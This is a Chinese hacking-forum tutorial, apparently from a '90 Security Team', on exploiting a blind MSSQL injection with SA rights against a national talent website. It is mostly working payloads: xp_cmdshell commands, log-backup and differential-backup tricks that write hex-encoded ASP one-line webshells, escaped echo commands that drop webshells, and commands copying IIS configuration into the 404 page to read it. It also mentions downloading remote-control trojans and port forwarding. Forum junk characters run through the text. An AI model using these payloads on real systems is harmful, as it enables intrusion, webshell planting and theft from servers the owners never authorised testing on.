sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————

; Y" c% r, [9 W
# d$ V( h& ~: V' v" ]1 ^/ z                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

                                                                 
  B8 a4 g) C4 J. g                                                                 
9 ]5 O$ H4 g5 D. A5 ]" g                                                                  论坛： http://www.90team.net/

0 L' _  j' P5 n( L" X

. S  A% r; v' {- s# @. b友情检测国家人才网
& y* a. e2 Y7 z# E1 ]

内容：MSSQL注入SA权限不显错模式下的入侵


+ G! F* v& i0 r! n* e" T) e一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

! k8 o! n" I. h8 |! n- P/ a2 Q我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
& Q+ w7 y% f6 f- |- ?) w+ V
$ N7 Z) Z5 w3 Z! a7 l
5 K4 ~) E$ V% c7 d+ y( g# S/ Z这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
& L( ]/ r+ D* ~2 G9 o$ q
思路：
) z+ S4 ~* k8 p# m. G- C
0 M5 G9 h: I5 T- g) @& C首先：
/ e3 b: s0 n0 P1 R
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
; r) m3 p+ Q! e% \- z  O$ j
1.日志备份获得Webshell

2.数据库差异备份获得Webshell
3 ^, E  ^  i5 R% T+ `# O7 _( J% x
4.直接下载免杀远控木马。
3 A9 P4 q, ?! ]* R
5.直接下载LCX将服务器端口转发出来

6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。



% d; b2 Z. L; A5 y+ e  T在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
7 q3 l7 O$ E$ o) S# ^
我直接演示后面一个方法
0 W% w; ~$ O7 C

" B6 V9 p! |0 `/ d5 y5 [! G4 ~9 \分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
- I) K: S& C! k+ m  f( |5 p* G: j
( ~' U/ a. @$ S9 F" S. z


; a/ a3 R" f/ [7 l, G  P; q% G0 t◆日志备份：

& q2 m% D% `2 l. N1 F
1. 进行初始备份
, X5 i; G8 P. r3 Y* F; S; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

) l1 G0 T$ b" Y7 Q; r  H2. 插入数据
" T9 P5 @+ t2 m( B+ i5 J* \;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
: U' M1 X% B8 J& {, L6 s7 l
1 J5 i5 k7 [! X8 K2 [- M# j; O/ ~0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
. F& I$ F+ U+ F: N) I6 p2 Q
0 R+ Z! @& N+ K8 L

! H& a* P5 }. O: }  o8 J◆数据库差异备份

2 i: W3 s6 |+ U% a/ M, X（1. 进行差异备份准备工作
8 q. r- i3 G' n3 q  x$ r- U0 M
9 U# h- N" u* z3 O5 S9 i  [;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--

# y( m+ s& y  U0 j上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
  t" T/ z7 z1 @, b. B: Y& t/ B

% ~4 W3 b. h+ v4 U4 I# ?（2. 将数据写入到数据库
! J* E+ e4 w+ X  k, K: b;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
, Z5 Z) D3 c0 k. x
8 C3 _) ~. y3 `4 E8 d3 Q3. 备份数据库并清理临时文件
7 _7 x2 N0 S; M! a0 p  h  `
1 M2 r! p8 u) n$ q7 L) f2 Y. d: c;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

* A* @- S8 Z. ~6 f5 D0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
) e" w& u. O0 T  N1 U


# b% ?3 g9 @! Y3 t0 s用^转义字符来写ASP(一句话木马)文件的方法:   
, E7 m- B- T* v1 d, p  |
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

' s% g* V$ e% H8 ~, n2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

5 ^; T  ~9 @& V7 W8 t5 d读取IIS配置信息获取web路径

) i2 ^0 c6 B. l  y     
' C) \; v5 M5 |" l7 x- j  N  F     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
; h& E; e& Z/ _# g  Z  x" ^
# y8 k) m  e5 o2 n执行命令
     
. r5 N8 ~) }3 a$ _     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

# S$ U5 K# r8 S, `

1 [6 @% B1 l  P- A0 E8 N

8 z! \8 }/ x- K" A& T% A) d! K
6 _9 s% o/ L4 \5 S3 \
9 Q, R' V5 y' E! U( d! p
3 ^. j" `3 D; \' }+ j7 _2 i3 m% D
4 d( @0 L: s- h$ S/ ~, t2 C1 _) x


# I: E9 k" v& k% p  W

1 O' S5 w6 }6 o) n* J8 g; N' a0 N

1 j% x' Y  Y; t4 ?, Y8 c' X! x) x
" A2 N) ]2 B9 K  t; c

& |- @" ~& L: y+ K- r
/ B: n/ c/ I2 @! j

8 V# A# v  [, z" q- S
8 J) e4 ?% e8 J" F


( j0 K1 [" E: M. g/ U8 r

: ~2 x7 [" D# n
. t& @: w$ W# D

. k1 L' V8 \8 _3 p7 x' i% _
( \( E# Y5 b4 l9 u7 u  v  y
5 c) u' d1 k  J" f$ F3 L
& F6 O  `1 n, K& O1 w

, t7 u3 e8 E" ~) ~; C% J8 _/ `' @
. T3 S! {5 J' g: k5 u! l

/ h, |( p! O+ k: L  T& o
" I5 x* [9 ?( i; @
: k4 M; h) F* l( Z* E* G
0 }% p6 o6 e$ J
3 S. X. }* k, |7 T



) R: L! t0 o6 u$ ^$ k* r# p8 E, A; K* o